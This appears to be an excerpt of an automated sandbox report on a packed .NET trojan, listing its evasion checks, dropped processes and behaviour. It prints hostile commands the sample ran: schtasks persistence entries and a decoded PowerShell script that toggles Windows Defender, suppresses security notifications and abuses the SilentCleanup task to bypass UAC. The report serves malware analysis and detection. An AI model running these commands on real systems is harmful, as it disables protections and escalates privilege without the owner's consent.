Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98943
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98804
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591993
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99876
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599877
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599612
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599476
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599110
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598845
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99871
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99755
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99633
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99516
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99401
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99285
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99168
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99053
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98931
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98815
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99931
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99815
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99684
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99564
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99435
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99314
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99193
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99062
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98958
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98822
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98706
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98573
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98459
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99960
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99852
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99708
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99591
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99469
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99351
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99236
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99105
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98872
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99901
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99753
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99615
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.30.dr	Binary or memory string: VMware
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.30.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.30.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.30.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.30.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.30.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: WinDefend.exe, 00000004.00000002.3251120364.0000000001167000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2728713253.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2747981173.000000001B573000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3526000868.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.30.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003477000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003489000.00000004.00000800.00020000.00000000.sdmp, Info.txt.21.dr	Binary or memory string: VirtualMachine: False
Source: Amcache.hve.30.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:
Source: Amcache.hve.30.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: WinDefend.exe, 0000001F.00000002.3250841388.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: Amcache.hve.30.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: WinDefend.exe, 00000004.00000002.3251120364.0000000001167000.00000004.00000020.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3250933723.0000000001203000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000019.00000002.2255759689.0000015CBE79E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A2e$ConvertByrefToPtrVen_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRo
Source: Amcache.hve.30.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.30.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.30.dr	Binary or memory string: vmci.syshbin`
Source: Loaader.exe.3.dr	Binary or memory string: vmware
Source: Amcache.hve.30.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.30.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: VMware20,1
Source: Infected.exe, 00000003.00000002.2047247573.000000001AD7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef
Source: Amcache.hve.30.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.30.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.30.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.30.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.30.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.30.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.30.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.30.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.30.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\Client.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Client.exe.0.dr, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: Client.exe.0.dr, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: Client.exe.0.dr, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 